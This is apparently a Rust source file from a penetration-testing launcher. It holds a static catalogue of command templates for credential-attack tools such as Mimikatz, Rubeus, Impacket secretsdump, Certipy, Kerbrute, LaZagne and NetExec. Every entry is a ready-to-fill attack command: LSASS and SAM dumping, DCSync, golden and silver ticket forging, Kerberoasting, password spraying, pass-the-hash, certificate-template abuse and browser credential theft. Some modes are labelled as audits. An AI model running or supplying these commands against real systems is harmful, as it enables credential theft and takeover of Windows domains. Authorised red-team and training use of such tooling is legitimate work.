use crate::tools::types::{Tool, Mode, InputKind, OutputFormat};

pub const TOOLS: &[Tool] = &[
    Tool {
        name: "Mimikatz",
        binary: "mimikatz",
        description: "The iconic credential extraction tool for Windows.",
        modes: &[
            Mode {
                name: "Logon Passwords",
                cmd_template: r#"mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit" > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "LSA Dump",
                cmd_template: r#"mimikatz "privilege::debug" "lsadump::lsa /patch" "exit" > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "DCSync",
                cmd_template: r#"mimikatz "privilege::debug" "lsadump::dcsync /domain:{domain} /user:{target_user}" "exit" > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Custom("Target User", "target_user")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SAM Database",
                cmd_template: r#"mimikatz "privilege::debug" "lsadump::sam" "exit" > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Kerberos Tickets",
                cmd_template: r#"mimikatz "sekurlsa::tickets /export" "exit" > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Golden Ticket",
                cmd_template: r#"mimikatz "kerberos::golden /user:{user} /domain:{domain} /sid:{sid} /krbtgt:{hash} /id:500" "exit" > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Custom("Sid", "sid"), InputKind::Hash],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Silver Ticket",
                cmd_template: r#"mimikatz "kerberos::silver /user:{user} /domain:{domain} /sid:{sid} /target:{host} /service:{service} /rc4:{hash}" "exit" > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Custom("Sid", "sid"), InputKind::Custom("Host", "host"), InputKind::Custom("Service", "service"), InputKind::Hash],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "DPAPI Extract",
                cmd_template: r#"mimikatz "dpapi::chrome /in:'%localappdata%\Google\Chrome\User Data\Default\Login Data'" "exit" > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Token Elevate",
                cmd_template: r#"mimikatz "token::elevate" "exit" > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Credential Dump",
                cmd_template: r#"mimikatz "privilege::debug" "sekurlsa::logonpasswords" "lsadump::lsa /inject /name:krbtgt" "exit" > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Hashcat",
        binary: "hashcat",
        description: "The world's fastest password recovery tool with GPU acceleration.",
        modes: &[
            Mode {
                name: "NTLM Crack",
                cmd_template: r#"hashcat -m 1000 -a 0 {hash_file} {wordlist} -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file"), InputKind::Wordlist],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "MD5 Brute",
                cmd_template: r#"hashcat -m 0 -a 3 {hash_file} '?a?a?a?a?a?a?a' -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SHA256 Wordlist",
                cmd_template: r#"hashcat -m 1400 -a 0 {hash_file} {wordlist} -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file"), InputKind::Wordlist],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "NTLMv2 Crack",
                cmd_template: r#"hashcat -m 5600 -a 0 {hash_file} {wordlist} -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file"), InputKind::Wordlist],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "bcrypt Attack",
                cmd_template: r#"hashcat -m 3200 -a 0 {hash_file} {wordlist} -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file"), InputKind::Wordlist],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Mask Attack",
                cmd_template: r#"hashcat -m 1000 -a 3 {hash_file} '?u?l?l?l?l?d?d?s' -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Hybrid Attack",
                cmd_template: r#"hashcat -m 1000 -a 6 {hash_file} {wordlist} '?d?d?d?d' -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file"), InputKind::Wordlist],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Rules Attack",
                cmd_template: r#"hashcat -m 1000 -a 0 {hash_file} {wordlist} -r {rules_file} -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file"), InputKind::Wordlist, InputKind::Custom("Rules File", "rules_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "LM Hash Crack",
                cmd_template: r#"hashcat -m 3000 -a 3 {hash_file} '?a?a?a?a?a?a?a' -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Benchmark",
                cmd_template: r#"hashcat -m 1000 -a 0 {hash_file} {wordlist} -O -w 3 --force -o {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file"), InputKind::Wordlist],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "/opt/tsec/tools/secretsdump.py (Impacket)",
        binary: "/opt/tsec/tools/secretsdump.py",
        description: "Remotely dump SAM, LSA secrets, and NTDS.dit from Windows systems.",
        modes: &[
            Mode {
                name: "Remote SAM",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py {domain}/{user}:{password}@{target} > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "DCSync Attack",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py {domain}/{user}:{password}@{dc_ip} -just-dc-ntlm > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "NTDS Extract",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py -ntds {ntds_file} -system {system_hive} LOCAL > {output_file}"#,
                inputs: &[InputKind::Custom("Ntds File", "ntds_file"), InputKind::Custom("System Hive", "system_hive")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SAM Hives",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py -sam {sam_hive} -system {system_hive} LOCAL > {output_file}"#,
                inputs: &[InputKind::Custom("Sam Hive", "sam_hive"), InputKind::Custom("System Hive", "system_hive")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Pass-the-Hash",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py -hashes {lmhash}:{nthash} {domain}/{user}@{target} > {output_file}"#,
                inputs: &[InputKind::Custom("Lmhash", "lmhash"), InputKind::Custom("Nthash", "nthash"), InputKind::Domain, InputKind::Username, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "VSS Method",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py {domain}/{user}:{password}@{target} -use-vss > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Kerberos Auth",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py -k -no-pass {domain}/{user}@{target} > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "History Hashes",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py {domain}/{user}:{password}@{dc_ip} -history > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "User Targeted",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py {domain}/{user}:{password}@{dc_ip} -just-dc-user {target_user} > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Custom("Target User", "target_user")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Domain Dump",
                cmd_template: r#"/opt/tsec/tools/secretsdump.py {domain}/{user}:{password}@{dc_ip} -just-dc-ntlm -history -pwd-last-set > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "John the Ripper",
        binary: "john",
        description: "Fast password cracker with extensive hash type support.",
        modes: &[
            Mode {
                name: "Auto Detect",
                cmd_template: r#"john {hash_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Wordlist",
                cmd_template: r#"john --wordlist={wordlist} {hash_file} > {output_file}"#,
                inputs: &[InputKind::Wordlist, InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Incremental",
                cmd_template: r#"john --incremental {hash_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Rules Attack",
                cmd_template: r#"john --wordlist={wordlist} --rules {hash_file} > {output_file}"#,
                inputs: &[InputKind::Wordlist, InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "NTLM Format",
                cmd_template: r#"john --format=nt {hash_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Show Cracked",
                cmd_template: r#"john --show {hash_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "GPU Acceleration",
                cmd_template: r#"john --format={format} --device=gpu {hash_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Format", "format"), InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SHA512crypt",
                cmd_template: r#"john --format=sha512crypt {hash_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Session Resume",
                cmd_template: r#"john --restore={session_name} > {output_file}"#,
                inputs: &[InputKind::Custom("Session Name", "session_name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Comprehensive",
                cmd_template: r#"john --wordlist={wordlist} --rules --incremental {hash_file} > {output_file}"#,
                inputs: &[InputKind::Wordlist, InputKind::Custom("Hash File", "hash_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "LaZagne",
        binary: "lazagne",
        description: "Cross-platform credential recovery from local software stores.",
        modes: &[
            Mode {
                name: "All Modules",
                cmd_template: r#"lazagne all > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Browsers",
                cmd_template: r#"lazagne browsers > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Windows Credential",
                cmd_template: r#"lazagne windows > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Databases",
                cmd_template: r#"lazagne databases > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WiFi Passwords",
                cmd_template: r#"lazagne wifi > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Git Credentials",
                cmd_template: r#"lazagne git > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Chats & Mails",
                cmd_template: r#"lazagne chats mails > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Quiet Mode",
                cmd_template: r#"lazagne all -quiet -output {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Specific Browser",
                cmd_template: r#"lazagne browsers -firefox > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Credential Sweep",
                cmd_template: r#"lazagne all -vv -output {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "pypykatz",
        binary: "pypykatz",
        description: "Pure Python Mimikatz implementation for credential extraction.",
        modes: &[
            Mode {
                name: "LSASS Dump",
                cmd_template: r#"pypykatz lsa minidump {lsass.dmp} > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Live Registry",
                cmd_template: r#"pypykatz live lsa > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SAM Hives",
                cmd_template: r#"pypykatz registry {system_hive} {sam_hive} > {output_file}"#,
                inputs: &[InputKind::Custom("System Hive", "system_hive"), InputKind::Custom("Sam Hive", "sam_hive")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Cached Creds",
                cmd_template: r#"pypykatz registry {security_hive} {system_hive} --json > {output_file}"#,
                inputs: &[InputKind::Custom("Security Hive", "security_hive"), InputKind::Custom("System Hive", "system_hive")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "DPAPI Secrets",
                cmd_template: r#"pypykatz dpapi minidump {lsass.dmp} > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Kerberos Tickets",
                cmd_template: r#"pypykatz kerberos minidump {lsass.dmp} > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "LSA Secrets",
                cmd_template: r#"pypykatz registry {security_hive} --lsa-secret > {output_file}"#,
                inputs: &[InputKind::Custom("Security Hive", "security_hive")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "JSON Output",
                cmd_template: r#"pypykatz lsa minidump {dump} -o json > {output_file}"#,
                inputs: &[InputKind::Custom("Dump", "dump")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "Backup Key",
                cmd_template: r#"pypykatz dpapi backupkeys {security_hive} > {output_file}"#,
                inputs: &[InputKind::Custom("Security Hive", "security_hive")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Analysis",
                cmd_template: r#"pypykatz lsa minidump {lsass.dmp} && pypykatz dpapi minidump {lsass.dmp} > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Kerbrute",
        binary: "kerbrute",
        description: "Kerberos pre-authentication brute-forcing and user enumeration.",
        modes: &[
            Mode {
                name: "User Enum",
                cmd_template: r#"kerbrute userenum --dc {dc_ip} -d {domain} {userlist} -o {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Domain, InputKind::Custom("Userlist", "userlist")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Password Spray",
                cmd_template: r#"kerbrute passwordspray --dc {dc_ip} -d {domain} {userlist} {password} -o {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Domain, InputKind::Custom("Userlist", "userlist"), InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Brute Force",
                cmd_template: r#"kerbrute bruteuser --dc {dc_ip} -d {domain} {wordlist} {username} -o {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Domain, InputKind::Wordlist, InputKind::Username],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "AS-REP Roast",
                cmd_template: r#"kerbrute userenum --dc {dc_ip} -d {domain} {userlist} 2>&1 | grep 'no pre-auth' > {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Domain, InputKind::Custom("Userlist", "userlist")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Safe Spray",
                cmd_template: r#"kerbrute passwordspray --dc {dc_ip} -d {domain} {userlist} {pass} -t 1 -o {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Domain, InputKind::Custom("Userlist", "userlist"), InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Custom KDC",
                cmd_template: r#"kerbrute userenum --kdc {kdc_host} -d {domain} {userlist} -o {output_file}"#,
                inputs: &[InputKind::Custom("Kdc Host", "kdc_host"), InputKind::Domain, InputKind::Custom("Userlist", "userlist")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "JSON Output",
                cmd_template: r#"kerbrute userenum --dc {dc_ip} -d {domain} {userlist} -o {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Domain, InputKind::Custom("Userlist", "userlist")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "Delay Control",
                cmd_template: r#"kerbrute passwordspray --dc {dc_ip} -d {domain} {userlist} {pass} --delay 5 -o {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Domain, InputKind::Custom("Userlist", "userlist"), InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Downgrade",
                cmd_template: r#"kerbrute userenum --dc {dc_ip} -d {domain} {userlist} --downgrade -o {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Domain, InputKind::Custom("Userlist", "userlist")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Domain Audit",
                cmd_template: r#"kerbrute userenum --dc {dc_ip} -d {domain} {userlist} -o {output_file} && kerbrute passwordspray --dc {dc_ip} -d {domain} {userlist} {pass}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Domain, InputKind::Custom("Userlist", "userlist"), InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Rubeus",
        binary: "Rubeus.exe",
        description: "C# toolset for raw Kerberos interaction and abuse.",
        modes: &[
            Mode {
                name: "Kerberoast",
                cmd_template: r#"Rubeus.exe kerberoast /format:hashcat /outfile:{output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "AS-REP Roast",
                cmd_template: r#"Rubeus.exe asreproast /format:hashcat /outfile:{output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Ticket Dump",
                cmd_template: r#"Rubeus.exe dump /service:krbtgt /outfile:{output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Pass the Ticket",
                cmd_template: r#"Rubeus.exe ptt /ticket:{ticket_kirbi} > {output_file}"#,
                inputs: &[InputKind::Custom("Ticket Kirbi", "ticket_kirbi")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Golden Ticket",
                cmd_template: r#"Rubeus.exe golden /user:{user} /domain:{domain} /sid:{sid} /krbtgt:{hash} /ptt > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Custom("Sid", "sid"), InputKind::Hash],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Silver Ticket",
                cmd_template: r#"Rubeus.exe silver /user:{user} /domain:{domain} /sid:{sid} /target:{host} /service:cifs /rc4:{hash} /ptt > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Custom("Sid", "sid"), InputKind::Custom("Host", "host"), InputKind::Hash],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "TGT Renewal",
                cmd_template: r#"Rubeus.exe renew /ticket:{tgt_kirbi} /ptt > {output_file}"#,
                inputs: &[InputKind::Custom("Tgt Kirbi", "tgt_kirbi")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "S4U Abuse",
                cmd_template: r#"Rubeus.exe s4u /user:{user} /rc4:{hash} /impersonateuser:admin /msdsspn:http/{host} /ptt > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Hash, InputKind::Custom("Host", "host")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Brute Force",
                cmd_template: r#"Rubeus.exe brute /password:{password} /noticket > {output_file}"#,
                inputs: &[InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Kerberos Audit",
                cmd_template: r#"Rubeus.exe kerberoast /format:hashcat && Rubeus.exe asreproast /format:hashcat && Rubeus.exe dump > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Certipy",
        binary: "certipy",
        description: "Active Directory Certificate Services enumeration and abuse.",
        modes: &[
            Mode {
                name: "CA Enum",
                cmd_template: r#"certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -output {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "Vulnerable Templates",
                cmd_template: r#"certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -vulnerable -output {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "ESC1 Attack",
                cmd_template: r#"certipy req -u {user}@{domain} -p {password} -dc-ip {dc_ip} -ca {ca} -template {template} -upn administrator -output {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Custom("Ca", "ca"), InputKind::Custom("Template", "template")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "ESC8 Attack",
                cmd_template: r#"certipy relay -target http://{ca}/certsrv/certfnsh.asp -ca {ca} > {output_file}"#,
                inputs: &[InputKind::Custom("Ca", "ca")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Certificate Auth",
                cmd_template: r#"certipy auth -pfx {cert}.pfx -dc-ip {dc_ip} > {output_file}"#,
                inputs: &[InputKind::Custom("Cert", "cert"), InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "ESC11 Attack",
                cmd_template: r#"certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -scheme ldaps -output {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "Template Abuse",
                cmd_template: r#"certipy req -u {user}@{domain} -p {password} -dc-ip {dc_ip} -ca {ca} -template {template} -on-behalf-of {domain}\\{target_user} -pfx {cert}.pfx > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Custom("Ca", "ca"), InputKind::Custom("Template", "template"), InputKind::Custom("Target User", "target_user"), InputKind::Custom("Cert", "cert")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "BloodHound",
                cmd_template: r#"certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -old-bloodhound -output {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "Shadow Credentials",
                cmd_template: r#"certipy shadow auto -u {user}@{domain} -p {password} -dc-ip {dc_ip} -account {target} > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full ADCS Audit",
                cmd_template: r#"certipy find -u {user}@{domain} -p {password} -dc-ip {dc_ip} -vulnerable -json -output {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Domain, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
        ],
    },
    Tool {
        name: "NetExec (NXC)",
        binary: "nxc",
        description: "Network execution tool for credential validation and AD testing.",
        modes: &[
            Mode {
                name: "Credential Spray",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SAM Dump",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} --sam > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "LSA Dump",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} --lsa > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "NTDS Dump",
                cmd_template: r#"nxc smb {dc} -u {user} -p {password} --ntds drsuapi > {output_file}"#,
                inputs: &[InputKind::Custom("Dc", "dc"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Pass-the-Hash",
                cmd_template: r#"nxc smb {targets} -u {user} -H {nthash} > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Custom("Nthash", "nthash")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "DPAPI Dump",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} --dpapi cookies > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Mimikatz Module",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} -M mimikatz > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "LSassy Module",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} -M lsassy > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "JSON Output",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} --sam --json > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Json,
                file_ext: "json",
            },
            Mode {
                name: "Full Harvest",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} --sam --lsa --dpapi cookies -M mimikatz -M lsassy > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
];
